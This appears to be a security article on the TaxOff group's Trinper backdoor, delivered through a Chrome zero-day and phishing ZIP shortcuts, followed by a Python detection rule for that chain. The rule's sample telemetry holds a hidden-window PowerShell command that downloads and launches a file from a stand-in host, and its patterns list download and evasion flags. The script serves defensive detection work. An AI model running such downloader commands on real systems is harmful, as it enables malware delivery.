Broke in through Chrome, stole documents, and vanished before the antivirus could react — analysis of the Trinper backdoor

ExcalibuR


He doesn’t break doors — he uses the ones you left open.


In March 2025, experts from Positive Technologies recorded a series of targeted attacks on Russian organizations using a previously unknown vulnerability in Google Chrome. Behind the cyber operation was a group called TaxOff, which exploited CVE-2025-2783 to deploy a powerful backdoor known as Trinper. The vulnerability has already been patched, but the attack demonstrated how dangerous zero-day-based intrusion chains can be.


The initial infection vector was a phishing email disguised as an invitation to the “Primakov Readings” forum. Clicking the link in the email triggered a one-click exploit, after which the Trinper trojan was installed on the victim’s machine. A similar pattern was observed in October 2024, when the malware spread via fake invitations to a Union State security conference.


Trinper, written in C++, is multithreaded: it collects system information, logs keystrokes, and harvests files of specific formats (including .doc, .xls, .ppt, .rtf, and .pdf) in parallel. The backdoor connects to a remote command-and-control (C2) server and receives instructions from it, ranging from launching a command interpreter and opening a reverse shell to modifying directories and deleting itself. Because these tasks run in separate threads, Trinper can keep a continuous exchange with the server going while it gathers data, downloads additional modules, and carries out multi-stage tasks.


Malware delivery relied on tools such as Donut and Cobalt Strike. In one case, the malicious code was distributed as a ZIP archive containing a Windows shortcut; opening the shortcut ran a PowerShell command that downloaded a decoy document and installed Trinper.


According to Positive Technologies, behavioral analysis of the infection chain revealed similarities to attacks by another group known as Team46. A month before the March incident, phishing emails purporting to come from Rostelecom and announcing technical maintenance had also been observed; they too carried a ZIP archive with a shortcut that executed PowerShell and installed the backdoor.


Another case, described by Doctor Web in September 2024, involved an attack on a logistics company that exploited a zero-day vulnerability, CVE-2024-6473, in Yandex Browser. The attack used DLL hijacking: a malicious library was planted where the browser's DLL search order would load it in place of the legitimate one, giving the attacker arbitrary code execution in the browser's context. The vulnerability was patched only in September 2024, with the release of version 24.7.1.380.


According to analysts, TaxOff has mature capabilities for conducting complex, targeted attacks. Its use of zero-day exploits and custom backdoors points to a strategic intent to maintain a long-term presence in victims' infrastructures. The attack vectors, phishing lures, and malware delivery methods show a high level of sophistication and a focus on specific targets, ranging from government agencies to industrial sectors.
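The delivery chain described above (ZIP archive -> Windows shortcut -> PowerShell that fetches a decoy document) is the stage a defender can most reliably catch in process-creation telemetry: a shortcut double-clicked from an archive shows up as explorer.exe spawning powershell.exe from a Temp staging folder with a download cmdlet and hidden-window flags on the command line. The Python below is an added detection example written for this page; it is not code from Positive Technologies, Doctor Web, or the Trinper operators. The tab-separated log format and every event in SAMPLE_EVENTS are constructed for the example (field names loosely follow Sysmon Event ID 1, hostnames use the reserved .invalid TLD), and the regexes and alert threshold are assumptions to tune against your own baseline.

```python
"""Flag the LNK -> PowerShell downloader chain in process-creation telemetry.

Added example for this page, not vendor or attacker code. Input is a constructed
log: one process-creation event per line, tab-separated Key=Value fields,
loosely modelled on Sysmon Event ID 1. Real telemetry differs in shape.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (NOT real logs).
SAMPLE_EVENTS = "\n".join([
    # Explorer itself: never flagged, it is not a PowerShell image.
    "ProcessId=4120\tImage=C:\\Windows\\explorer.exe"
    "\tParentImage=C:\\Windows\\System32\\userinit.exe"
    "\tCurrentDirectory=C:\\Windows\\\tCommandLine=C:\\Windows\\Explorer.EXE",
    # The chain from the article: shortcut inside an opened ZIP -> hidden PowerShell -> decoy download.
    "ProcessId=5532\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Windows\\explorer.exe"
    "\tCurrentDirectory=C:\\Users\\u\\AppData\\Local\\Temp\\Temp1_invitation.zip\\"
    "\tCommandLine=powershell.exe -w hidden -nop -c \"Invoke-WebRequest -Uri http://lure.example.invalid/invite.pdf"
    " -OutFile $env:TEMP\\invite.pdf; Start-Process $env:TEMP\\invite.pdf\"",
    # Benign: admin runs an inventory script from a cmd prompt (one weak trait only).
    "ProcessId=6010\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Windows\\System32\\cmd.exe\tCurrentDirectory=C:\\Scripts\\"
    "\tCommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    # Benign: scheduled task pulls an internal feed (download primitive, nothing else).
    "ProcessId=6200\tImage=C:\\Program Files\\PowerShell\\7\\pwsh.exe"
    "\tParentImage=C:\\Windows\\System32\\svchost.exe\tCurrentDirectory=C:\\Tasks\\"
    "\tCommandLine=pwsh.exe -c \"Invoke-RestMethod https://intranet.example.invalid/feed\"",
])

POWERSHELL_RE = re.compile(r"\\(powershell(_ise)?|pwsh)\.exe$", re.I)
EXPLORER_RE = re.compile(r"\\explorer\.exe$", re.I)
# Download primitives commonly seen in shortcut payloads (assumed list, extend as needed).
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Invoke-RestMethod|\birm\b|"
    r"Net\.WebClient|Download(File|String|Data)|Start-BitsTransfer|bitsadmin", re.I)
# Flags that hide the console or skip policy/profile, typical for one-click lures.
EVASION_RE = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b|"
    r"-e(nc|ncodedcommand)?\s|-e(xecutionpolicy|p)\s+bypass", re.I)
# Where an archive opened straight from a mail client gets extracted.
STAGING_RE = re.compile(r"\\(Temp|Downloads|INetCache|Temporary Internet Files)\\", re.I)

ALERT_THRESHOLD = 3  # assumption: three independent traits before alerting


def parse_event(line: str) -> Dict[str, str]:
    """Parse one tab-separated Key=Value line into a dict (first '=' splits)."""
    fields: Dict[str, str] = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the suspicious traits found in one event; empty for non-PowerShell images."""
    reasons: List[str] = []
    if not POWERSHELL_RE.search(ev.get("Image", "")):
        return reasons
    cmd = ev.get("CommandLine", "")
    if EXPLORER_RE.search(ev.get("ParentImage", "")):
        reasons.append("PowerShell spawned by explorer.exe (double-clicked shortcut or file)")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download primitive in command line")
    if EVASION_RE.search(cmd):
        reasons.append("hidden window / no-profile / policy-bypass flags")
    if STAGING_RE.search(ev.get("CurrentDirectory", "")) or STAGING_RE.search(cmd):
        reasons.append("runs from or writes to a Temp/Downloads staging path")
    return reasons


def detect(log_text: str) -> List[Tuple[str, List[str]]]:
    """Run the rule over every non-empty line; return (ProcessId, reasons) for alerts."""
    alerts: List[Tuple[str, List[str]]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = score_event(ev)
        if len(reasons) >= ALERT_THRESHOLD:
            alerts.append((ev.get("ProcessId", "?"), reasons))
    return alerts


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT ProcessId={pid}")
        for r in reasons:
            print("   -", r)
```

Only the constructed shortcut chain (ProcessId 5532) crosses the threshold, with all four traits; the admin script and the scheduled task each show a single trait and stay quiet. In real environments, shortcut payloads sometimes route through cmd.exe or conhost.exe first, so a production rule should also walk the grandparent and correlate with a file-creation event for a .lnk under the same Temp path.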